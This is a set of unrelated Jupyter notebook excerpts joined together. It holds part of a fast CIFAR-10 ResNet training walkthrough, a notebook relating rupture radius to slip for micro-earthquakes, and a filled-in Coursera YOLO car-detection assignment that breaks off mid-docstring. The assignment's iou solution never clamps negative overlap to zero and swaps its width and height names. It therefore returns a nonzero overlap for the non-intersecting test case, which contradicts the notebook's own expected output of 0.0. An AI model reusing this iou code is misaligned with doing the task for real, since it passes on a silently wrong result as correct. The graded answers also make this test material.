projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
'pool': nn.MaxPool2d(2),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(block=shortcut_block, prep_bn_relu=True)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, 2x output dim, global maxpool (47s; test acc 90.7%)
The final pooling layer before the classifier is a concatenation of global average pooling and max pooling layers, inherited from the original network.
We replace this with a more standard global max pooling layer and double the output dimension of the final convolution to compensate for the reduction in input dimension to the classifier, leading to a final test accuracy of 90.7% in 47s. Note that average pooling at this stage underperforms max pooling significantly.
```
def shortcut_block(c_in, c_out, stride, **kw):
projection = (stride != 1) or (c_in != c_out)
if projection:
return {
'conv': nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False),
'bn': batch_norm(c_out, **kw),
'relu': nn.ReLU(True),
'pool': nn.MaxPool2d(2),
}
else:
return {'id': Identity()}
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = DAWN_net(c=[64,128,256,512], block=shortcut_block, prep_bn_relu=True, concat_pool=False)
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - backbone, bn scale init=1, classifier weight=0.125 (47s; test acc 91.1%)
By default in PyTorch (0.4), initial batch norm scales are chosen uniformly at random from the interval [0,1]. Channels which are initialised near zero could be wasted so we replace this with a constant initialisation at 1.
This leads to a larger signal through the network and to compensate we introduce an overall constant multiplicative rescaling of the final classifier. A rough manual optimisation of this extra hyperparameter suggest that 0.125 is a reasonable value.
(The low value makes predictions less certain and appears to ease optimisation.)
With these changes in place, 20 epoch training reaches a test accuracy of 91.1% in 47s.
```
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = net(extra_layers=(), res_layers=())
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - double width, 60 epoch train! (321s; test acc 93.5%)
ne approach that doesn't seem particularly promising is to just add width.
If we double the channel dimensions and train for 60 epochs we can reach 93.5% test accuracy with a 5 layer network. This is nice but not efficient since training now takes 321s.
```
lr_schedule = PiecewiseLinear([0, 12, 60], [0, 0.4, 0])
batch_size = 512
c = 128
n = net(channels={'prep': c, 'layer1': 2*c, 'layer2': 4*c, 'layer3': 8*c}, extra_layers=(), res_layers=())
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - extra:L1+L2+L3 network, 60 epochs, cutout=12 (180s, 95.0% test acc)
```
lr_schedule = PiecewiseLinear([0, 12, 60], [0, 0.4, 0])
batch_size = 512
cutout=12
n = net(extra_layers=['layer1', 'layer2', 'layer3'], res_layers=())
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(cutout, cutout)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - final network Residual:L1+L3, 20 epochs (66s; test acc 93.7%)
```
lr_schedule = PiecewiseLinear([0, 4, 20], [0, 0.4, 0])
batch_size = 512
n = net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
### [Post 4: Architecture](https://www.myrtle.ai/2018/10/26/how_to_train_your_resnet_4/) - final network, 24 epochs (79s; test acc 94.1%)
```
lr_schedule = PiecewiseLinear([0, 5, 24], [0, 0.4, 0])
batch_size = 512
n = net()
draw(build_graph(n))
model = Network(n).to(device).half()
train_set_x = Transform(train_set, [Crop(32, 32), FlipLR(), Cutout(8,8)])
summary = train(model, lr_schedule, train_set_x, test_set, batch_size=batch_size, num_workers=0)
```
|
github_jupyter
|
# Radius and mean slip of rock patches failing in micro-seismic events
When stresses in a rock surpass its shear strength, the affected rock volume will fail to shearing.
Assume that we observe a circular patch with radius $r$ on, e.g. a fault, and that this patch is affected by a slip with an average slip distance $d$.
This slip is a response to increasing shear stresses, hence it reduces shear stresses by $\Delta \tau$.
These three parameters are linked by:
$$\Delta \tau = \frac{7 \, \pi \, \mu}{16 \, r} \, d $$
where $\mu$ is the shear modulus near the fault.
The seismic moment $M_0$, the energy to offset an area $A$ by a distance $d$, is defined by:
$$M_0 = \mu \, d \, A$$
$$ d = \frac{M_0}{\mu \, A} $$
with $A = \pi r^2$.
The [USGS definition](https://earthquake.usgs.gov/learn/glossary/?term=seismic%20moment) for the seismic moments is: *The seismic moment is a measure of the size of an earthquake based on the area of fault rupture, the average amount of slip, and the force that was required to overcome the friction sticking the rocks together that were offset by faulting. Seismic moment can also be calculated from the amplitude spectra of seismic waves.*
Putting the $d = ...$ equation in the first one and solving for the radius yields:
$$r = \bigg(\frac{7 \, M_0}{16 \, \Delta \tau}\bigg)^{1/3}$$
The following code leads to a plot which relates the influenced radius $r$ to the average displacement $d$ for micro-earthquakes. It shows that a larger area can be affected by smaller displacements for a small shear stress reduction $\Delta \tau$ to bigger displacements for smaller areas for larger shear stress reductions.
```
# import libraries
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set_style('ticks')
sns.set_context('talk')
def get_displacement(mu, dtau, m0):
r = ((7*m0)/(16*dtau))**(1./3.)
d = m0 / (mu*r**2 * np.pi)
# Alternatively:
# od = np.pi * mu * r * (7/(16*dtau*m0**2))**(1./3.)
# d = 1 / od
return r, d
# Parameters
dtau = np.arange(1,11)*1e6 # shear stress reduction
m0 = np.array([3.2e10, 1.0e12, 3.2e13]) # seismic moment
mu = 2.5e10 # shear modulus
# calculate displacements and radius
displacements = np.concatenate([get_displacement(mu, x, m0) for x in dtau])
# seperate arrays
disps = displacements[1::2,:]
rads = displacements[0::2,:]
# min tau and max tau
mitau = np.polyfit(disps[0,:], rads[0,:],1)
matau = np.polyfit(disps[-1,:], rads[-1,:],1)
dsim = np.linspace(0,0.033)
mirad = mitau[0]*dsim+mitau[1]
marad = matau[0]*dsim+matau[1]
# plot results
fig = plt.figure(figsize=[12,7])
plt.plot(disps[:,0]*1000, rads[:,0], '.', label='M$_w$1')
plt.plot(disps[:,1]*1000, rads[:,1], '^', label='M$_w$2')
plt.plot(disps[:,2]*1000, rads[:,2], 's', label='M$_w$3')
plt.plot(dsim*1000, mirad, '-', color='gray', alpha=.5)
plt.plot(dsim*1000, marad, '-', color='gray', alpha=.5)
plt.legend()
plt.ylim([0, 300])
plt.xlim([0, 0.033*1000])
plt.text(.8, 200, '$\Delta tau = 1$ MPa', fontsize=14)
plt.text(20, 55, '$\Delta tau = 10$ MPa', fontsize=14)
plt.xlabel('average displacement [mm]')
plt.ylabel('influenced radius [m]')
#fig.savefig('displacement_radius.png', dpi=300, bbox_inches='tight')
```
|
github_jupyter
|
# Autonomous driving - Car detection
Welcome to your week 3 programming assignment. You will learn about object detection using the very powerful YOLO model. Many of the ideas in this notebook are described in the two YOLO papers: [Redmon et al., 2016](https://arxiv.org/abs/1506.02640) and [Redmon and Farhadi, 2016](https://arxiv.org/abs/1612.08242).
**You will learn to**:
- Use object detection on a car detection dataset
- Deal with bounding boxes
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "3a".
* You can find your original work saved in the notebook with the previous version name ("v3")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates
* Clarified "YOLO" instructions preceding the code.
* Added details about anchor boxes.
* Added explanation of how score is calculated.
* `yolo_filter_boxes`: added additional hints. Clarify syntax for argmax and max.
* `iou`: clarify instructions for finding the intersection.
* `iou`: give variable names for all 8 box vertices, for clarity. Adds `width` and `height` variables for clarity.
* `iou`: add test cases to check handling of non-intersecting boxes, intersection at vertices, or intersection at edges.
* `yolo_non_max_suppression`: clarify syntax for tf.image.non_max_suppression and keras.gather.
* "convert output of the model to usable bounding box tensors": Provides a link to the definition of `yolo_head`.
* `predict`: hint on calling sess.run.
* Spelling, grammar, wording and formatting updates to improve clarity.
## Import libraries
Run the following cell to load the packages and dependencies that you will find useful as you build the object detector!
```
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes
from yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body
%matplotlib inline
```
**Important Note**: As you can see, we import Keras's backend as K. This means that to use a Keras function in this notebook, you will need to write: `K.function(...)`.
## 1 - Problem Statement
You are working on a self-driving car. As a critical component of this project, you'd like to first build a car detection system. To collect data, you've mounted a camera to the hood (meaning the front) of the car, which takes pictures of the road ahead every few seconds while you drive around.
<center>
<video width="400" height="200" src="nb_images/road_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Pictures taken from a car-mounted camera while driving around Silicon Valley. <br> We thank [drive.ai](htps://www.drive.ai/) for providing this dataset.
</center></caption>
You've gathered all these images into a folder and have labelled them by drawing bounding boxes around every car you found. Here's an example of what your bounding boxes look like.
<img src="nb_images/box_label.png" style="width:500px;height:250;">
<caption><center> <u> **Figure 1** </u>: **Definition of a box**<br> </center></caption>
If you have 80 classes that you want the object detector to recognize, you can represent the class label $c$ either as an integer from 1 to 80, or as an 80-dimensional vector (with 80 numbers) one component of which is 1 and the rest of which are 0. The video lectures had used the latter representation; in this notebook, we will use both representations, depending on which is more convenient for a particular step.
In this exercise, you will learn how "You Only Look Once" (YOLO) performs object detection, and then apply it to car detection. Because the YOLO model is very computationally expensive to train, we will load pre-trained weights for you to use.
## 2 - YOLO
"You Only Look Once" (YOLO) is a popular algorithm because it achieves high accuracy while also being able to run in real-time. This algorithm "only looks once" at the image in the sense that it requires only one forward propagation pass through the network to make predictions. After non-max suppression, it then outputs recognized objects together with the bounding boxes.
### 2.1 - Model details
#### Inputs and outputs
- The **input** is a batch of images, and each image has the shape (m, 608, 608, 3)
- The **output** is a list of bounding boxes along with the recognized classes. Each bounding box is represented by 6 numbers $(p_c, b_x, b_y, b_h, b_w, c)$ as explained above. If you expand $c$ into an 80-dimensional vector, each bounding box is then represented by 85 numbers.
#### Anchor Boxes
* Anchor boxes are chosen by exploring the training data to choose reasonable height/width ratios that represent the different classes. For this assignment, 5 anchor boxes were chosen for you (to cover the 80 classes), and stored in the file './model_data/yolo_anchors.txt'
* The dimension for anchor boxes is the second to last dimension in the encoding: $(m, n_H,n_W,anchors,classes)$.
* The YOLO architecture is: IMAGE (m, 608, 608, 3) -> DEEP CNN -> ENCODING (m, 19, 19, 5, 85).
#### Encoding
Let's look in greater detail at what this encoding represents.
<img src="nb_images/architecture.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 2** </u>: **Encoding architecture for YOLO**<br> </center></caption>
If the center/midpoint of an object falls into a grid cell, that grid cell is responsible for detecting that object.
Since we are using 5 anchor boxes, each of the 19 x19 cells thus encodes information about 5 boxes. Anchor boxes are defined only by their width and height.
For simplicity, we will flatten the last two last dimensions of the shape (19, 19, 5, 85) encoding. So the output of the Deep CNN is (19, 19, 425).
<img src="nb_images/flatten.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 3** </u>: **Flattening the last two last dimensions**<br> </center></caption>
#### Class score
Now, for each box (of each cell) we will compute the following element-wise product and extract a probability that the box contains a certain class.
The class score is $score_{c,i} = p_{c} \times c_{i}$: the probability that there is an object $p_{c}$ times the probability that the object is a certain class $c_{i}$.
<img src="nb_images/probability_extraction.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 4** </u>: **Find the class detected by each box**<br> </center></caption>
##### Example of figure 4
* In figure 4, let's say for box 1 (cell 1), the probability that an object exists is $p_{1}=0.60$. So there's a 60% chance that an object exists in box 1 (cell 1).
* The probability that the object is the class "category 3 (a car)" is $c_{3}=0.73$.
* The score for box 1 and for category "3" is $score_{1,3}=0.60 \times 0.73 = 0.44$.
* Let's say we calculate the score for all 80 classes in box 1, and find that the score for the car class (class 3) is the maximum. So we'll assign the score 0.44 and class "3" to this box "1".
#### Visualizing classes
Here's one way to visualize what YOLO is predicting on an image:
- For each of the 19x19 grid cells, find the maximum of the probability scores (taking a max across the 80 classes, one maximum for each of the 5 anchor boxes).
- Color that grid cell according to what object that grid cell considers the most likely.
Doing this results in this picture:
<img src="nb_images/proba_map.png" style="width:300px;height:300;">
<caption><center> <u> **Figure 5** </u>: Each one of the 19x19 grid cells is colored according to which class has the largest predicted probability in that cell.<br> </center></caption>
Note that this visualization isn't a core part of the YOLO algorithm itself for making predictions; it's just a nice way of visualizing an intermediate result of the algorithm.
#### Visualizing bounding boxes
Another way to visualize YOLO's output is to plot the bounding boxes that it outputs. Doing that results in a visualization like this:
<img src="nb_images/anchor_map.png" style="width:200px;height:200;">
<caption><center> <u> **Figure 6** </u>: Each cell gives you 5 boxes. In total, the model predicts: 19x19x5 = 1805 boxes just by looking once at the image (one forward pass through the network)! Different colors denote different classes. <br> </center></caption>
#### Non-Max suppression
In the figure above, we plotted only boxes for which the model had assigned a high probability, but this is still too many boxes. You'd like to reduce the algorithm's output to a much smaller number of detected objects.
To do so, you'll use **non-max suppression**. Specifically, you'll carry out these steps:
- Get rid of boxes with a low score (meaning, the box is not very confident about detecting a class; either due to the low probability of any object, or low probability of this particular class).
- Select only one box when several boxes overlap with each other and detect the same object.
### 2.2 - Filtering with a threshold on class scores
You are going to first apply a filter by thresholding. You would like to get rid of any box for which the class "score" is less than a chosen threshold.
The model gives you a total of 19x19x5x85 numbers, with each box described by 85 numbers. It is convenient to rearrange the (19,19,5,85) (or (19,19,425)) dimensional tensor into the following variables:
- `box_confidence`: tensor of shape $(19 \times 19, 5, 1)$ containing $p_c$ (confidence probability that there's some object) for each of the 5 boxes predicted in each of the 19x19 cells.
- `boxes`: tensor of shape $(19 \times 19, 5, 4)$ containing the midpoint and dimensions $(b_x, b_y, b_h, b_w)$ for each of the 5 boxes in each cell.
- `box_class_probs`: tensor of shape $(19 \times 19, 5, 80)$ containing the "class probabilities" $(c_1, c_2, ... c_{80})$ for each of the 80 classes for each of the 5 boxes per cell.
#### **Exercise**: Implement `yolo_filter_boxes()`.
1. Compute box scores by doing the elementwise product as described in Figure 4 ($p \times c$).
The following code may help you choose the right operator:
```python
a = np.random.randn(19*19, 5, 1)
b = np.random.randn(19*19, 5, 80)
c = a * b # shape of c will be (19*19, 5, 80)
```
This is an example of **broadcasting** (multiplying vectors of different sizes).
2. For each box, find:
- the index of the class with the maximum box score
- the corresponding box score
**Useful references**
* [Keras argmax](https://keras.io/backend/#argmax)
* [Keras max](https://keras.io/backend/#max)
**Additional Hints**
* For the `axis` parameter of `argmax` and `max`, if you want to select the **last** axis, one way to do so is to set `axis=-1`. This is similar to Python array indexing, where you can select the last position of an array using `arrayname[-1]`.
* Applying `max` normally collapses the axis for which the maximum is applied. `keepdims=False` is the default option, and allows that dimension to be removed. We don't need to keep the last dimension after applying the maximum here.
* Even though the documentation shows `keras.backend.argmax`, use `keras.argmax`. Similarly, use `keras.max`.
3. Create a mask by using a threshold. As a reminder: `([0.9, 0.3, 0.4, 0.5, 0.1] < 0.4)` returns: `[False, True, False, False, True]`. The mask should be True for the boxes you want to keep.
4. Use TensorFlow to apply the mask to `box_class_scores`, `boxes` and `box_classes` to filter out the boxes we don't want. You should be left with just the subset of boxes you want to keep.
**Useful reference**:
* [boolean mask](https://www.tensorflow.org/api_docs/python/tf/boolean_mask)
**Additional Hints**:
* For the `tf.boolean_mask`, we can keep the default `axis=None`.
**Reminder**: to call a Keras function, you should use `K.function(...)`.
```
# GRADED FUNCTION: yolo_filter_boxes
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = np.multiply(box_confidence, box_class_probs)
### END CODE HERE ###
# Step 2: Find the box_classes using the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
box_class_scores = K.max(box_scores, axis=-1)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
filtering_mask = box_class_scores >= threshold
### END CODE HERE ###
# Step 4: Apply the mask to box_class_scores, boxes and box_classes
### START CODE HERE ### (≈ 3 lines)
scores = tf.boolean_mask(box_class_scores, filtering_mask)
boxes = tf.boolean_mask(boxes, filtering_mask)
classes = tf.boolean_mask(box_classes, filtering_mask)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
10.7506
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 8.42653275 3.27136683 -0.5313437 -4.94137383]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
7
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(?,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(?, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(?,)
</td>
</tr>
</table>
**Note** In the test for `yolo_filter_boxes`, we're using random numbers to test the function. In real data, the `box_class_probs` would contain non-zero values between 0 and 1 for the probabilities. The box coordinates in `boxes` would also be chosen so that lengths and heights are non-negative.
### 2.3 - Non-max suppression ###
Even after filtering by thresholding over the class scores, you still end up with a lot of overlapping boxes. A second filter for selecting the right boxes is called non-maximum suppression (NMS).
<img src="nb_images/non-max-suppression.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 7** </u>: In this example, the model has predicted 3 cars, but it's actually 3 predictions of the same car. Running non-max suppression (NMS) will select only the most accurate (highest probability) of the 3 boxes. <br> </center></caption>
Non-max suppression uses the very important function called **"Intersection over Union"**, or IoU.
<img src="nb_images/iou.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 8** </u>: Definition of "Intersection over Union". <br> </center></caption>
#### **Exercise**: Implement iou(). Some hints:
- In this code, we use the convention that (0,0) is the top-left corner of an image, (1,0) is the upper-right corner, and (1,1) is the lower-right corner. In other words, the (0,0) origin starts at the top left corner of the image. As x increases, we move to the right. As y increases, we move down.
- For this exercise, we define a box using its two corners: upper left $(x_1, y_1)$ and lower right $(x_2,y_2)$, instead of using the midpoint, height and width. (This makes it a bit easier to calculate the intersection).
- To calculate the area of a rectangle, multiply its height $(y_2 - y_1)$ by its width $(x_2 - x_1)$. (Since $(x_1,y_1)$ is the top left and $x_2,y_2$ are the bottom right, these differences should be non-negative.
- To find the **intersection** of the two boxes $(xi_{1}, yi_{1}, xi_{2}, yi_{2})$:
- Feel free to draw some examples on paper to clarify this conceptually.
- The top left corner of the intersection $(xi_{1}, yi_{1})$ is found by comparing the top left corners $(x_1, y_1)$ of the two boxes and finding a vertex that has an x-coordinate that is closer to the right, and y-coordinate that is closer to the bottom.
- The bottom right corner of the intersection $(xi_{2}, yi_{2})$ is found by comparing the bottom right corners $(x_2,y_2)$ of the two boxes and finding a vertex whose x-coordinate is closer to the left, and the y-coordinate that is closer to the top.
- The two boxes **may have no intersection**. You can detect this if the intersection coordinates you calculate end up being the top right and/or bottom left corners of an intersection box. Another way to think of this is if you calculate the height $(y_2 - y_1)$ or width $(x_2 - x_1)$ and find that at least one of these lengths is negative, then there is no intersection (intersection area is zero).
- The two boxes may intersect at the **edges or vertices**, in which case the intersection area is still zero. This happens when either the height or width (or both) of the calculated intersection is zero.
**Additional Hints**
- `xi1` = **max**imum of the x1 coordinates of the two boxes
- `yi1` = **max**imum of the y1 coordinates of the two boxes
- `xi2` = **min**imum of the x2 coordinates of the two boxes
- `yi2` = **min**imum of the y2 coordinates of the two boxes
- `inter_area` = You can use `max(height, 0)` and `max(width, 0)`
```
# GRADED FUNCTION: iou
def iou(box1, box2):
"""Implement the intersection over union (IoU) between box1 and box2
Arguments:
box1 -- first box, list object with coordinates (box1_x1, box1_y1, box1_x2, box_1_y2)
box2 -- second box, list object with coordinates (box2_x1, box2_y1, box2_x2, box2_y2)
"""
# Assign variable names to coordinates for clarity
(box1_x1, box1_y1, box1_x2, box1_y2) = box1
(box2_x1, box2_y1, box2_x2, box2_y2) = box2
# Calculate the (yi1, xi1, yi2, xi2) coordinates of the intersection of box1 and box2. Calculate its Area.
### START CODE HERE ### (≈ 7 lines)
xi1 = max(box1[0], box2[0])
yi1 = max(box1[1], box2[1])
xi2 = min(box1[2], box2[2])
yi2 = min(box1[3], box2[3])
inter_width = (yi2 - yi1)
inter_height = (xi2 - xi1)
inter_area = inter_width * inter_height
### END CODE HERE ###
# Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)
### START CODE HERE ### (≈ 3 lines)
box1_area = (box1[2] - box1[0]) * (box1[3] - box1[1])
box2_area = (box2[2] - box2[0]) * (box2[3] - box2[1])
union_area = box1_area + box2_area - inter_area
### END CODE HERE ###
# compute the IoU
### START CODE HERE ### (≈ 1 line)
iou = inter_area / union_area
### END CODE HERE ###
return iou
## Test case 1: boxes intersect
box1 = (2, 1, 4, 3)
box2 = (1, 2, 3, 4)
print("iou for intersecting boxes = " + str(iou(box1, box2)))
## Test case 2: boxes do not intersect
box1 = (1,2,3,4)
box2 = (5,6,7,8)
print("iou for non-intersecting boxes = " + str(iou(box1,box2)))
## Test case 3: boxes intersect at vertices only
box1 = (1,1,2,2)
box2 = (2,2,3,3)
print("iou for boxes that only touch at vertices = " + str(iou(box1,box2)))
## Test case 4: boxes intersect at edge only
box1 = (1,1,3,3)
box2 = (2,3,3,4)
print("iou for boxes that only touch at edges = " + str(iou(box1,box2)))
```
**Expected Output**:
```
iou for intersecting boxes = 0.14285714285714285
iou for non-intersecting boxes = 0.0
iou for boxes that only touch at vertices = 0.0
iou for boxes that only touch at edges = 0.0
```
#### YOLO non-max suppression
You are now ready to implement non-max suppression. The key steps are:
1. Select the box that has the highest score.
2. Compute the overlap of this box with all other boxes, and remove boxes that overlap significantly (iou >= `iou_threshold`).
3. Go back to step 1 and iterate until there are no more boxes with a lower score than the currently selected box.
This will remove all boxes that have a large overlap with the selected boxes. Only the "best" boxes remain.
**Exercise**: Implement yolo_non_max_suppression() using TensorFlow. TensorFlow has two built-in functions that are used to implement non-max suppression (so you don't actually need to use your `iou()` implementation):
** Reference documentation **
- [tf.image.non_max_suppression()](https://www.tensorflow.org/api_docs/python/tf/image/non_max_suppression)
```
tf.image.non_max_suppression(
boxes,
scores,
max_output_size,
iou_threshold=0.5,
name=None
)
```
Note that in the version of tensorflow used here, there is no parameter `score_threshold` (it's shown in the documentation for the latest version) so trying to set this value will result in an error message: *got an unexpected keyword argument 'score_threshold.*
- [K.gather()](https://www.tensorflow.org/api_docs/python/tf/keras/backend/gather)
Even though the documentation shows `tf.keras.backend.gather()`, you can use `keras.gather()`.
```
keras.gather(
reference,
indices
)
```
```
# GRADED FUNCTION: yolo_non_max_suppression
def yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):
"""
Applies Non-max suppression (NMS) to set of boxes
Arguments:
scores -- tensor of shape (None,), output of yolo_filter_boxes()
boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)
classes -- tensor of shape (None,), output of yolo_filter_boxes()
max_boxes -- integer, maximum number of predicted boxes you'd like
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (, None), predicted score for each box
boxes -- tensor of shape (4, None), predicted box coordinates
classes -- tensor of shape (, None), predicted class for each box
Note: The "None" dimension of the output tensors has obviously to be less than max_boxes. Note also that this
function will transpose the shapes of scores, boxes, classes. This is made for convenience.
"""
max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()
K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor
# Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep
### START CODE HERE ### (≈ 1 line)
nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes_tensor, iou_threshold)
### END CODE HERE ###
# Use K.gather() to select only nms_indices from scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = K.gather(scores, nms_indices)
boxes = K.gather(boxes, nms_indices)
classes = K.gather(classes, nms_indices)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_b:
scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)
classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
6.9384
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[-5.299932 3.13798141 4.45036697 0.95942086]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
-2.24527
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
### 2.4 Wrapping up the filtering
It's time to implement a function taking the output of the deep CNN (the 19x19x5x85 dimensional encoding) and filtering through all the boxes using the functions you've just implemented.
**Exercise**: Implement `yolo_eval()` which takes the output of the YOLO encoding and filters the boxes using score threshold and NMS. There's just one last implementational detail you have to know. There're a few ways of representing boxes, such as via their corners or via their midpoint and height/width. YOLO converts between a few such formats at different times, using the following functions (which we have provided):
```python
boxes = yolo_boxes_to_corners(box_xy, box_wh)
```
which converts the yolo box coordinates (x,y,w,h) to box corners' coordinates (x1, y1, x2, y2) to fit the input of `yolo_filter_boxes`
```python
boxes = scale_boxes(boxes, image_shape)
```
YOLO's network was trained to run on 608x608 images. If you are testing this data on a different size image--for example, the car detection dataset had 720x1280 images--this step rescales the boxes so that they can be plotted on top of the original 720x1280 image.
Don't worry about these two functions; we'll show you where they need to be called.
```
# GRADED FUNCTION: yolo_eval
def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
"""
Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.
Arguments:
yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:
box_confidence: tensor of shape (None, 19, 19, 5, 1)
box_xy: tensor of shape (None, 19, 19, 5, 2)
box_wh: tensor of shape (None, 19, 19, 5, 2)
box_class_probs: tensor of shape (None, 19, 19, 5, 80)
image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (608., 608.) (has to be float32 dtype)
max_boxes -- integer, maximum number of predicted boxes you'd like
score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
